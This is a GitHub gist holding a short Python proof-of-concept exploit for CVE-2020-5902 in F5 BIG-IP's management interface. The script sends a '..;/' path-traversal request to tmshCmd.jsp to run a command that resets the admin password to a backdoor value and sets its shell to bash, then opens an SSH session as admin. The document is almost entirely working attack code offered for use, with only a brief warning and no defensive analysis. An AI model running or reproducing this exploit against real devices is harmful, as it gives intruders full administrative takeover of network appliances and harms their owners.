Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
#!/usr/bin/env python3
import os
import requests
import urllib.parse
target='<ip of target>'
base_url=f'https://{target}/'
password='B@ckd00r!'
def check(base_url):
r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp', verify=False)
return r.status_code == 200
def change_admin_password(base_url, password):
command=urllib.parse.quote(f'modify auth user admin password {password} shell bash')
r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}', verify=False)
print(r.text)
if check(base_url):
change_admin_password(base_url, password)
print(f'Login with password: {password}')
os.system(f'ssh admin@{target}')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.